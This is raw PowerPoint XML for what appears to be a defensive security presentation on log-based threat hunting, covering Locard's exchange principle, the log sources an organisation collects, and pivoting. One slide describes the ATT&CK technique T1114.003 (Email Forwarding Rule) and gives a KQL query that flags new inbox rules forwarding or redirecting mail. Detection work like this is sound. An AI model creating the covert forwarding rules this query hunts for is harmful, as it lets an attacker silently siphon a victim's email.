          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5040983" y="2671572"/>
            <a:ext cx="6801197" cy="1648143"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every contact leaves a trace…in a log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layers of the attacker prism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pivoting is navigating the graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3238910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11996D0-90A6-5C89-24C9-0F7BE3474A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every contact leaves a trace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{251834F3-A894-8FB7-7BCA-844420440B7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595914" y="1463669"/>
            <a:ext cx="5543629" cy="2154436"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as Locard's exchange principle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1026" name="Picture 2" descr="undefined">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D6A41C1-5721-304C-6856-D060D02AD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863" y="-1"/>
            <a:ext cx="5154612" cy="69945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6147B4-7F64-32E0-CD23-D3C6C27B609B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137743" y="5505810"/>
            <a:ext cx="3442853" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dr. Edmond Locard (1877–1966) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>French criminologist and pioneer in forensic science </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DA2347F-B0FA-4C83-FDD7-38CF9229E2A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="851729" y="1964196"/>
            <a:ext cx="5573709" cy="4948518"/>
            <a:chOff x="4733989" y="-1329338"/>
            <a:chExt cx="5573709" cy="4948518"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Picture 16" descr="A close-up of a paper&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4121ED9F-9A68-ECCE-0A5E-1987C218157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b="29252"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4733989" y="-1329338"/>
              <a:ext cx="5573709" cy="4948518"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2DA877B-5F52-E54C-7870-8B8A37ED5313}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4986866" y="-880533"/>
              <a:ext cx="4798039" cy="4401205"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:latin typeface="Baskerville Old Face" panose="02020602080505020303" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>“Wherever he steps, whatever he touches, whatever he leaves, even unconsciously, will serve as a silent witness against him… </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0">
                  <a:latin typeface="Baskerville Old Face" panose="02020602080505020303" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>This is evidence that does not forget. It is not confused by the excitement of the moment. It is not absent because human witnesses are. It is factual evidence.” </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1139210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Every contact leaves a trace…in a log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="layer0_new copy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="9030" t="-19" r="-3338" b="19"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="129048" y="1175955"/>
            <a:ext cx="8560406" cy="5034949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="765868" y="1924207"/>
            <a:ext cx="1040598" cy="366109"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 78878"/>
              <a:gd name="adj2" fmla="val 74740"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">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Critical business data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5118399" y="2033393"/>
            <a:ext cx="797733" cy="230104"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -15630"/>
              <a:gd name="adj2" fmla="val 201986"/>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VPN Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4268756" y="2263497"/>
            <a:ext cx="797733" cy="359441"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 34299"/>
              <a:gd name="adj2" fmla="val 146907"/>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Firewall Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3638861" y="2740698"/>
            <a:ext cx="844751" cy="366404"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 65961"/>
              <a:gd name="adj2" fmla="val 111772"/>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Web Proxy Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4793913" y="3943676"/>
            <a:ext cx="1005643" cy="359441"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80173"/>
              <a:gd name="adj2" fmla="val 3664"/>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Window Domain Logins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4527715" y="4437858"/>
            <a:ext cx="815254" cy="276770"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -76309"/>
              <a:gd name="adj2" fmla="val -63904"/>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DHCP Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6183525" y="4576242"/>
            <a:ext cx="870771" cy="366404"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45327"/>
              <a:gd name="adj2" fmla="val -134104"/>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Anti-virus Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7380315" y="4752727"/>
            <a:ext cx="870771" cy="366404"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -109113"/>
              <a:gd name="adj2" fmla="val -206439"/>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Remote Access Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6805261" y="2740698"/>
            <a:ext cx="870771" cy="366404"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -81027"/>
              <a:gd name="adj2" fmla="val 59444"/>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Event log data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2634569" y="1774916"/>
            <a:ext cx="1004293" cy="366404"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46535"/>
              <a:gd name="adj2" fmla="val 115123"/>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Host scanning results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3080453" y="1205544"/>
            <a:ext cx="1004293" cy="366404"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46535"/>
              <a:gd name="adj2" fmla="val 115123"/>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Certificate Authority Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2954163" y="4950256"/>
            <a:ext cx="1048188" cy="716403"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 40731"/>
              <a:gd name="adj2" fmla="val -110743"/>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Account / Group Membership Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2023692" y="2507724"/>
            <a:ext cx="1056761" cy="497179"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46535"/>
              <a:gd name="adj2" fmla="val 115123"/>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Vulnerability Assessment results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="TextBox 86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523598" y="1327791"/>
            <a:ext cx="1521276" cy="606488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:body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Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>To protect this critical data…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Oval 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1095806" y="1108356"/>
            <a:ext cx="323377" cy="3108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89" name="TextBox 88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319269" y="1359615"/>
            <a:ext cx="2209924" cy="343492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="46629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Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>…we need all these logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Oval 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5030763" y="1386164"/>
            <a:ext cx="323377" cy="3108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24" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2816819" y="3378890"/>
            <a:ext cx="942787" cy="344658"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 88139"/>
              <a:gd name="adj2" fmla="val -1792"/>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Network IDS results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4618952" y="3551220"/>
            <a:ext cx="1005643" cy="286289"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -91301"/>
              <a:gd name="adj2" fmla="val 34799"/>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err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Netflow</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2890583" y="3940679"/>
            <a:ext cx="942787" cy="344658"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 79896"/>
              <a:gd name="adj2" fmla="val -129570"/>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Security Scan results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394503" y="3551220"/>
            <a:ext cx="855005" cy="366250"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -95301"/>
              <a:gd name="adj2" fmla="val 65780"/>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Crash reports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="AutoShape 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317214" y="3107102"/>
            <a:ext cx="943128" cy="333386"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -46122"/>
              <a:gd name="adj2" fmla="val 174776"/>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Wireless logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A0C45E-2331-352F-FC50-49D0E1121AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8592992" y="1717004"/>
            <a:ext cx="3678536" cy="3908762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="91440" rIns="91440" bIns="91440" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Email Collection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Email Forwarding Rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: T1114.003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Sub-technique of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:  T1114</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Tactic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Platforms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Google Workspace, Linux, Office 365, Windows, macOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">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OfficeActivity</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where</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err="1">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TimeGenerated</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&gt;= ago(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="339966"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Mono" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Mono" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Mono" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>30</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d)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where</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Operation == </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'New-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">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InboxRule</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extend</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details = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">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parse_json</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(Parameters)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where</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details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contains</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'ForwardTo’</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or</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details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contains</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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">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RedirectTo</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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Cascadia Mono" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:ea typeface="Cascadia Mono" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
                <a:cs typeface="Cascadia Mono" panose="020B0609020000020004" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>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3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA2CD267-A38D-BF39-47AE-E006E4996C1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178904" y="6308035"/>
            <a:ext cx="10860157" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Big Data systems are the full network tap for logs. Imprison attacker activity in it.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3260781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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="76"/>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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="83"/>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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="77"/>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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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25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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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25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25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25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25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5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5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9" grpId="0"/>
      <p:bldP spid="90" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
